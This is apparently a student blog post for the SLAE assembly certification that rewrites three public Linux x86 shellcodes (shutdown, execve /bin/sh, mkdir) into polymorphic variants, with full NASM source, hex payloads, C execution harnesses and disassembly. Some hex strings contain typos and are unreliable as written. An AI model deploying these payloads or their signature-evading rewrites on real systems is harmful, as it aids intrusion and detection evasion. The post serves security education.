0x06 SLAE - Polymorphic versions

First sample from shell-storm

Original shellcode

shellcode-876.nasm

; http://shell-storm.org/shellcode/files/shellcode-876.php
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start

_start:
  xor    eax,eax
  xor    edx,edx
  push   eax
  push   0x682d
  mov    edi,esp
  push   eax
  push   0x6e
  mov    WORD [esp+0x1],0x776f
  mov    edi,esp
  push   eax
  push   0x6e776f64
  push   0x74756873
  push   0x2f2f2f6e
  push   0x6962732f
  mov    ebx,esp
  push   edx
  push   esi
  push   edi
  push   ebx
  mov    ecx,esp
  mov    al,0xb
  int    0x80

The original shellcode has 56 bytes. The file can be accessed here http://shell-storm.org/shellcode/files/shellcode-876.php

Polymorphic shellcode version

shellcode-876-poly.nasm

; http://shell-storm.org/shellcode/files/shellcode-876.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 69 bytes

global _start

_start:
  cdq
  mul edx
  push  word 0x682d
  mov    edi, esp
  push   eax
  push   0x6e
  mov    WORD [esp+0x1],0x776f
  mov    edi, esp
  push   eax
  mov    dword [esp-4], 0x6e776f64
  mov    dword [esp-8], 0x74756873
  mov    dword [esp-12], 0x2f2f2f6e
  mov    dword [esp-16], 0x6962732f
  sub    esp, 16
  mov    ebx, esp
  push   edx
  push   esi
  push   edi
  push   ebx
  mov    ecx, esp
  mov    al, 0xb
  int    0x80

Has we can see on the following block of code below, there is some modification of the assembly which give a different shellcode but give the same result. The modified versions have 69 bytes. So, this is less than the 150% of the original shellcode. The maximum allowed for the assignment of this sample is 84 bytes.

The shellcode is :

\x99\xf7\xe2\x66\x68\x2d\x68\x89\xe7\x50\x6a\x6e\x66\xc7\x44\x24\x01\x6f\x77\x89
\xe7\x50xc7\x44\x24\xfc\x64\x6f\x77\x6e\xc7\x44\x24\xf8\x73\x68\x75\x74\xc7\x44\
x24\xf4\x6e\x2f\x2f\x2f\xc7\x44\x24\xf0\x2f\x73\x62\x69\x83\xec\x10\x89\xe3\x52\
x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80

Here is also a simple demo of the shellcode generation and execution.

Second sample from shell-storm

Original Shellcode

/*
 Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
 Date     : 10 Feb 2011
 Author   : kernel_panik
 Thanks   : cOokie, agix, antrhacks
*/

/*
 xor ecx, ecx
 mul ecx
 push ecx
 push 0x68732f2f   ;; hs//
 push 0x6e69622f   ;; nib/
 mov ebx, esp
 mov al, 11
 int 0x80
*/


#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
              "\xe3\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
 printf ("Shellcode length : %d bytes\n", strlen (code));
 int(*f)()=(int(*)())code;
 f();
}

The original shellcode have 21 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-752.php

Polymorphic shellcode version

; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes

global _start

_start:
  xor eax, eax
  xor ecx, ecx
  push eax
  mov dword [esp-4], 0x68732f2f
  mov dword [esp-8], 0x6e69622f
  sub esp, 8
  mov ebx, esp
  mov al, 11
  int 0x80

The polymorphic version have 30 bytes which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was pretty small, there is less possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.

Here is the shellcode:

\x31\xc0\x31\xc9\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80

Third sample from shell-storm

Orignal shellcode

/*
 * This shellcode will do a mkdir() of 'hacked' and then an exit()
 * Written by zillion@safemode.org
 *
 */

char shellcode[]=
        "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
        "\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
        "\x61\x63\x6b\x65\x64\x23";


void main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

The sample can be accessed from shell storm: http://shell-storm.org/shellcode/files/shellcode-542.php

The author only gave the shellcode. So, for the purpose of the SLAE, we will get the assembly of that shellcode for better understanding and be able to create a polymorphic version of it.

echo -ne "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68\x61\x63\x6b\x65\x64\x23" >shellcode542

ndisasm -b32 shellcode542

00000000  EB16              jmp short 0x18
00000002  5E                pop esi
00000003  31C0              xor eax,eax
00000005  884606            mov [esi+0x6],al
00000008  B027              mov al,0x27
0000000A  8D1E              lea ebx,[esi]
0000000C  66B9ED01          mov cx,0x1ed
00000010  CD80              int 0x80
00000012  B001              mov al,0x1
00000014  31DB              xor ebx,ebx
00000016  CD80              int 0x80
00000018  E8E5FFFFFF        call 0x2
0000001D  6861636B65        push dword 0x656b6361
00000022  64                fs
00000023  23                db 0x23

The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.

Polymorphic shellcode version

I realized that a lot of the assembly in the original one can be modified to do a different version of it. Let's keep it simple. Basically, the shellcode will create a mkdir folder with the name "hacked" with the right 775.

My final assembly polymorphic shellcode is pretty different but does the same thing.

; http://shell-storm.org/shellcode/files/shellcode-542.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 28 bytes

global _start

_start:
	xor eax,eax
	push eax

	;sys mkdir
	mov al,0x27
	; push ./hacked
	push 0x64656b63
	push 0x61682f2e
	mov ebx,esp
	; push 777 which equal to 0x1ff in octal
	mov cx, 0x1ff
	int 0x80

	;sys exit
	push 0x1
	pop eax
	int 0x80

\x31\xc0\x50\xb0\x27\x68\x63\x6b\x65\x64\x68\x2e\x2f\x68\x61\x89\xe3\x66\xb9\xff\x01\xcd\x80\x6a\x01\x58\xcd\x80

The polymorphic version have 28 bytes. So, it's smaller then the original one which is great.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification

​http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/​

Student ID: SLAE-1374